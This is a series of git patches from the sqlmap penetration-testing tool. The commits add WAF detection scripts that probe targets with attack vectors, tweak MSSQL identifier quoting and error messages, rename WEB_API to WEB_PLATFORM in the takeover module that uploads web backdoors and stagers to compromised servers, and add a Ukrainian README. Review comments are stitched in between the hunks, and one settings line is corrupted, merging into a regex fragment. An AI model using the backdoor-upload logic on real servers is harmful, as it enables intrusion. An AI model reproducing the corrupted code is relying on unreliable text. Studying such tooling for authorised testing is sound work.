files changed, 30 insertions(+), 2 deletions(-) create mode 100644 waf/approach.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 415e0f1e72a..cc7a85a6680 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.31" +VERSION = "1.2.12.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 147c9efdae6..367a04d82f7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4bfede0eaaa7ad5767de41ef849de918 lib/core/settings.py +de90de0ae57ff593bb50dc6d150e2b7b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -400,6 +400,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud 9bf2e07cdc54a661aea056223caccfb6 waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py +e33e11d4a8a91ade0561bb65d4d33bc6 waf/approach.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py 2fe5335fde7a7f5b19d2f363a55ce805 waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py diff --git a/waf/approach.py b/waf/approach.py new file mode 100644 index 00000000000..1077e0b673d --- /dev/null +++ b/waf/approach.py 
@@ -0,0 +1,27 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Approach Web Application Firewall (Approach)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = re.search(r"Approach Web Application Firewall", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= re.search(r"Approach()? Web Application Firewall", page or "", re.I) is not None + retval |= " Your IP address has been logged and this information could be used by authorities to track you." in (page or "") + retval |= all(_ in (page or "") for _ in ("Sorry for the inconvenience!", "If this was an legitimate request please contact us with details!")) + if retval: + break + + return retval From 4c9e0b9f1e1a364477961a42542454f77c1560e9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Dec 2018 00:35:08 +0100 Subject: [PATCH 406/428] Adding Bluedon WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/bluedon.py | 25 +++++++++++++++++++++++++ 3 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 waf/bluedon.py diff --git a/lib/core/settings.py b/lib/core/settings.py index cc7a85a6680..40144c80189 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.32" +VERSION = "1.2.12.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 367a04d82f7..f7a08957ac0 100644 
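Review bot: The second pattern in detect, `r"Approach()? Web Application Firewall"`, contains an empty optional group `()?` that matches nothing and changes nothing, so it is almost certainly a typo for some intended variant; either drop the group or write the alternative that was meant. `code` from `page, headers, code = get_page(get=vector)` is never read, and `page or ""` is evaluated three times; unpack as `page, headers, _ = get_page(get=vector)` and normalise once with `page = page or ""` before the checks. The same unused `code` and repeated `page or ""` appear in the waf/bluedon.py detect() added in the following commit.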
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -de90de0ae57ff593bb50dc6d150e2b7b lib/core/settings.py +43eec1a3d017f1d440b89e9ecf3f2ff8 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -409,6 +409,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 44f724ab7d333397975fecdf7e50be56 waf/bigip.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +6d505434a13365cbe3b01f912ea36a44 waf/bluedon.py c52c6974c0dae6815f27cfdee6121d7b waf/chinacache.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py diff --git a/waf/bluedon.py b/waf/bluedon.py new file mode 100644 index 00000000000..678f5e423e6 --- /dev/null +++ b/waf/bluedon.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Bluedon Web Application Firewall (Bluedon Information Security Technology)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = re.search(r"BDWAF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None + retval |= re.search(r"Bluedon Web Application Firewall", page or "", re.I) is not None + if retval: + break + + return retval From a007cd30e5270ffff23cb7af745c07d9afd2bc47 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 19 Dec 2018 11:11:56 +0100 Subject: [PATCH 407/428] Fixes #3412 --- lib/core/common.py | 14 +++++++++----- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d0fd775b8b0..6291297c77b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3659,11 +3659,15 @@ def safeSQLIdentificatorNaming(name, isTable=False): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.upper() elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - parts = retVal.split('.', 1) - for i in xrange(len(parts)): - if ((parts[i] or " ")[0].isdigit() or not re.match(r"\A\w+\Z", parts[i], re.U)): - parts[i] = "[%s]" % parts[i] - retVal = '.'.join(parts) + if isTable: + parts = retVal.split('.', 1) + for i in xrange(len(parts)): + if parts[i] and (re.search(r"\A\d|[^\w]", parts[i], re.U) or parts[i].upper() in kb.keywords): + parts[i] = "[%s]" % parts[i] + retVal = '.'.join(parts) + else: + if re.search(r"\A\d|[^\w]", retVal, re.U) or retVal.upper() in kb.keywords: + retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 40144c80189..8e50c85b531 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.33" +VERSION = "1.2.12.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f7a08957ac0..606401622d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
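Review bot: The MSSQL/Sybase branch of safeSQLIdentificatorNaming now evaluates the same quoting predicate twice — `re.search(r"\A\d|[^\w]", x, re.U) or x.upper() in kb.keywords` — once per part inside the `isTable` loop and once on `retVal` in the `else`; a local helper keeps them identical, e.g. `_needsQuoting = lambda part: re.search(r"\A\d|\W", part, re.U) or part.upper() in kb.keywords`, after which each branch reduces to the `"[%s]" % ...` wrap when it holds. `[^\w]` is simply `\W`. The `_` tested in the following `if _ and DEFAULT_MSSQL_SCHEMA not in retVal` line is assigned before the hunk, so I cannot confirm it is unaffected by the restructuring; safeSQLIdentificatorNaming begins and ends outside the hunk.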
@@ -29,7 +29,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -ae4bf844c42f9a36ebbe8444e89f7041 lib/core/common.py +22eb6444f89ef013cd256c92771cff5a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -43eec1a3d017f1d440b89e9ecf3f2ff8 lib/core/settings.py +16ba53ca22bb764b6cdee725ffe41618 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 5e099144d305720bd84dde8a069369f25e4b83cc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Dec 2018 10:38:27 +0100 Subject: [PATCH 408/428] Minor message update --- lib/core/settings.py | 2 +- sqlmap.py | 5 +++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8e50c85b531..70c2280a578 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.34" +VERSION = "1.2.12.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index f5e592b0f66..9d9272eabd7 100755 --- a/sqlmap.py +++ b/sqlmap.py 
@@ -171,8 +171,9 @@ def main(): raise except SqlmapUserQuitException: - errMsg = "user quit" - logger.error(errMsg) + if not conf.batch: + errMsg = "user quit" + logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 606401622d9..31c3ac8d3cc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -16ba53ca22bb764b6cdee725ffe41618 lib/core/settings.py +08295f121daafa4c20282201861422cb lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -82f2326ec9cc8719859266f72c19f9b3 sqlmap.py +83d4d43cf6ce06635418ce75ae71eb90 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 9564c8e8b1984e5f7eba741750cfca5fbde387f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Dec 2018 11:29:57 +0100 Subject: [PATCH 409/428] Refactoring regarding casting warnings --- lib/controller/checks.py | 17 ++++++++++++++--- lib/core/enums.py | 2 +- lib/core/settings.py | 4 ++-- lib/request/connect.py | 4 ++-- lib/takeover/web.py | 34 +++++++++++++++++----------------- txt/checksum.md5 | 10 +++++----- 6 files changed, 41 insertions(+), 30 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 104aeec9e52..05bfd6cd93d 100644 --- a/lib/controller/checks.py 
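Review bot: With the new `if not conf.batch:` guard the SqlmapUserQuitException handler in main() leaves no trace at all in batch mode, so an unattended run that stops this way ends without any log line explaining why. Keeping a low-severity record, e.g. an `else:` branch with `logger.debug("user quit")`, preserves the quieter output while still leaving the reason in the log. main() starts before the hunk and continues after it.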
+++ b/lib/controller/checks.py @@ -69,6 +69,7 @@ from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import REDIRECTION +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNoneDataException @@ -1052,9 +1053,19 @@ def _(page): kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE if casting: - errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type") - errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter) - errMsg += "at the back-end web application" + errMsg = "possible %s casting detected (e.g. '" % ("integer" if origValue.isdigit() else "type") + + platform = conf.url.split('.')[-1].lower() + if platform == WEB_PLATFORM.ASP: + errMsg += "%s=CInt(request.querystring(\"%s\"))" % (parameter, parameter) + elif platform == WEB_PLATFORM.ASPX: + errMsg += "int.TryParse(Request.QueryString[\"%s\"], out %s)" % (parameter, parameter) + elif platform == WEB_PLATFORM.JSP: + errMsg += "%s=Integer.parseInt(request.getParameter(\"%s\"))" % (parameter, parameter) + else: + errMsg += "$%s=intval($_REQUEST[\"%s\"])" % (parameter, parameter) + + errMsg += "') at the back-end web application" logger.error(errMsg) if kb.ignoreCasted is None: diff --git a/lib/core/enums.py b/lib/core/enums.py index 45b08c526d1..16125dd1717 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -310,7 +310,7 @@ class ADJUST_TIME_DELAY: NO = 0 YES = 1 -class WEB_API: +class WEB_PLATFORM: PHP = "php" ASP = "asp" ASPX = "aspx" diff --git a/lib/core/settings.py b/lib/core/settings.py index 70c2280a578..c7291655a01 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
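Review bot: `platform = conf.url.split('.')[-1].lower()` takes the text after the last dot of the whole URL, so if conf.url still carries a query string or fragment at this point (e.g. a constructed `page.asp?id=1`) the result is `asp?id=1`, matches none of the WEB_PLATFORM values and the message falls through to the PHP example; a URL whose path has no extension gives a host-name fragment the same way. Deriving the extension from the URL path component (the urlparse path, then the part after its last dot) would make the example track the target; if checks.py also imports the stdlib `platform` module, the local name shadows it and a name like `webPlatform` would be clearer. The lookup only affects the wording of the error message, so the miss is cosmetic rather than functional. The enclosing `_` helper and its caller start before the hunk and continue after it.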
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.35" +VERSION = "1.2.12.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -687,7 +687,7 @@ MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' diff --git a/lib/request/connect.py b/lib/request/connect.py index 8dfe9438357..f5f3642fe4c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -78,7 +78,7 @@ class WebSocketException(Exception): from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapCompressionException from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException 
@@ -889,7 +889,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent postUrlEncode = False if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): + if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 67e0fdcb1ef..921366a00b1 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -43,7 +43,7 @@ from lib.core.enums import OS from lib.core.enums import PAYLOAD from lib.core.enums import PLACE -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX @@ -60,7 +60,7 @@ class Web: """ def __init__(self): - self.webApi = None + self.webPlatform = None self.webBaseUrl = None self.webBackdoorUrl = None self.webBackdoorFilePath = None @@ -109,14 +109,14 @@ def _webFileStreamUpload(self, stream, destFileName, directory): except TypeError: pass - if self.webApi in getPublicTypeMembers(WEB_API, True): + if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True): multipartParams = { "upload": "1", "file": stream, "uploadDir": directory, } - if self.webApi == WEB_API.ASPX: + if self.webPlatform == WEB_PLATFORM.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE 
@@ -130,7 +130,7 @@ def _webFileStreamUpload(self, stream, destFileName, directory): else: return True else: - logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) + logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform) return False def _webFileInject(self, fileContent, fileName, directory): @@ -158,13 +158,13 @@ def webInit(self): remote directory within the web server document root. """ - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: + if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: return self.checkDbmsOs() default = None - choices = list(getPublicTypeMembers(WEB_API, True)) + choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) for ext in choices: if conf.url.endswith(ext): @@ -172,7 +172,7 @@ def webInit(self): break if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP + default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP message = "which web application language does the web server " message += "support?\n" @@ -196,7 +196,7 @@ def webInit(self): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: - self.webApi = choices[int(choice) - 1] + self.webPlatform = choices[int(choice) - 1] break if not kb.absFilePaths: 
@@ -266,16 +266,16 @@ def webInit(self): _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) directories = _ - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webApi)) + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) + backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform)) - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) + stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)) for directory in directories: if not directory: continue - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) uploaded = False @@ -317,14 +317,14 @@ def webInit(self): infoMsg += "via UNION method" logger.info(infoMsg) - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) handle, filename = tempfile.mkstemp() os.close(handle) with open(filename, "w+b") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) + _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)) _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) 
@@ -353,7 +353,7 @@ def webInit(self): logger.warn(warnMsg) continue - elif self.webApi == WEB_API.ASPX: + elif self.webPlatform == WEB_PLATFORM.ASPX: kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) @@ -361,7 +361,7 @@ def webInit(self): infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) logger.info(infoMsg) - if self.webApi == WEB_API.ASP: + if self.webPlatform == WEB_PLATFORM.ASP: match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 31c3ac8d3cc..fc51b650672 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py +d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -37,7 +37,7 @@ c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py -0cf974cf4ff3b96e1a349a12e39f4693 lib/core/enums.py +5b6999c4b78180961e9f33e172d4dd66 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -08295f121daafa4c20282201861422cb lib/core/settings.py +3afa2b42741332ce14a8c98befcfdff7 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -40c4cc791ec657b612ccecf5b3241651 lib/request/connect.py +7ec820ec27161208a8411d81ec48161a lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -88,7 +88,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py -a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py +ce8524022df29602f3d6c3c41f938ad4 lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py From 7d1c2633c92f9589e1c02c113c434c5220d57da2 Mon Sep 17 00:00:00 2001 From: Denis Date: Sun, 23 Dec 2018 10:24:53 +0200 Subject: [PATCH 410/428] Add contributed Ukrainian translation (#3414) --- README.md | 1 + doc/translations/README-uk-UA.md | 50 ++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 doc/translations/README-uk-UA.md 
diff --git a/README.md b/README.md index ae75b0e606d..ad48e852818 100644 --- a/README.md +++ b/README.md @@ -67,3 +67,4 @@ Translations * [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md new file mode 100644 index 00000000000..ddbedef9fe7 --- /dev/null +++ b/doc/translations/README-uk-UA.md 
@@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання. + +Скриншоти +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki. + +Встановлення +---- + +Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master). 
